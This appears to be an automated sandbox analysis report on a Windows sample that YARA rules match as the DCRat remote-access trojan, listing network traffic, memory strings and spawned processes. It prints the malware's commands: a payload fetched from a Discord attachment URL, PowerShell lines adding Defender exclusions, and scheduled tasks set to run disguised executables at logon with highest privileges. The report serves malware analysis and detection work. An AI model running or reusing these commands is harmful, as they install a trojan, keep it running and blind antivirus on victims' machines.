                    Source: powershell.exe, 00000016.00000002.672141586.000000000499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.672127271.000000000556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.673640958.00000000050EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672938172.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                    Source: JRFdtWyAvbQxLlvO.exe, 00000013.00000002.672938172.0000000002C39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554326400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000011.00000002.672081969.0000000002AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com4Gk
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554390785.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.554469458.0000000002D29000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000008.00000000.550714016.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.6:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49723 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.6:49729 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.raw.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3d82590.7.raw.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, u003315/B9B.csLong String: Length: 19072
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, u003315/B9B.csLong String: Length: 19072
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3ea78e0.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 8.0.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: 2.2.64AE5410F978DF0F48DCC67508820EA230C566967E002.exe.3d82590.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile created: C:\Windows\SysWOW64\iasnapJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_010200402_2_01020040
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_0106F3002_2_0106F300
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_010642E02_2_010642E0
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_010635812_2_01063581
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_0106D4402_2_0106D440
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_010647902_2_01064790
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_0106A7F02_2_0106A7F0
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_0106DC852_2_0106DC85
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_010643A22_2_010643A2
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_0106F5A82_2_0106F5A8
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_0106B8702_2_0106B870
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_0106AB202_2_0106AB20
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_01063D232_2_01063D23
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeCode function: 2_2_01063CA92_2_01063CA9
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeCode function: 19_2_0297360019_2_02973600
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeCode function: 19_2_02975E3719_2_02975E37
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeCode function: 19_2_029753D119_2_029753D1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078EC07822_2_078EC078
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078EC07822_2_078EC078
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07E342B822_2_07E342B8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078E83D822_2_078E83D8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078E83E822_2_078E83E8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078E000622_2_078E0006
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078E004022_2_078E0040
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078E54A822_2_078E54A8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_078E54B822_2_078E54B8
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess Stats: CPU usage > 98%
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000001.00000002.366908799.00000000009F8000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSjxupcet.exeF vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000000.365818256.0000000000948000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSjxupcet.exeF vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.552936489.000000000111A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOveyjvjwoht.dll" vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000002.00000002.553950891.0000000001210000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe, 00000008.00000000.550768549.0000000000F58000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSjxupcet.exeF vs 64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeMetadefender: Detection: 29%
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeFile read: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe:Zone.IdentifierJump to behavior
                    Source: 64AE5410F978DF0F48DCC67508820EA230C566967E002.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe"
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" user
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                    Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\iasnap\fontdrvhost.exe'" /rl HIGHEST /f
                    Source: unknownProcess created: C:\Recovery\csrss.exe C:\Recovery\csrss.exe
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comrepl\fontdrvhost.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JRFdtWyAvbQxLlvO" /sc ONLOGON /tr "'C:\Recovery\JRFdtWyAvbQxLlvO.exe'" /rl HIGHEST /f
                    Source: unknownProcess created: C:\Recovery\JRFdtWyAvbQxLlvO.exe C:\Recovery\JRFdtWyAvbQxLlvO.exe
                    Source: C:\Recovery\csrss.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" user
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\System Volume Information\Chkdsk\SearchUI.exe'" /rl HIGHEST /f
                    Source: C:\Recovery\JRFdtWyAvbQxLlvO.exeProcess created: C:\Recovery\JRFdtWyAvbQxLlvO.exe "C:\Recovery\JRFdtWyAvbQxLlvO.exe" user
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f
                    Source: unknownProcess created: C:\System Volume Information\Chkdsk\SearchUI.exe C:\System Volume Information\Chkdsk\SearchUI.exe
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe'
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\iasnap\fontdrvhost.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe
                    Source: unknownProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe"
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\comrepl\fontdrvhost.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\JRFdtWyAvbQxLlvO.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\System Volume Information\Chkdsk\SearchUI.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Recovery\csrss.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" user
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PQCfAXDYbo.bat"
                    Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exeProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe" user
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe "C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" userJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeJump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\iasnap\fontdrvhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\comrepl\fontdrvhost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\JRFdtWyAvbQxLlvO.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\System Volume Information\Chkdsk\SearchUI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PQCfAXDYbo.bat" Jump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\iasnap\fontdrvhost.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comrepl\fontdrvhost.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JRFdtWyAvbQxLlvO" /sc ONLOGON /tr "'C:\Recovery\JRFdtWyAvbQxLlvO.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\System Volume Information\Chkdsk\SearchUI.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Recovery\csrss.exeProcess created: C:\Recovery\csrss.exe "C:\Recovery\csrss.exe" userJump to behavior
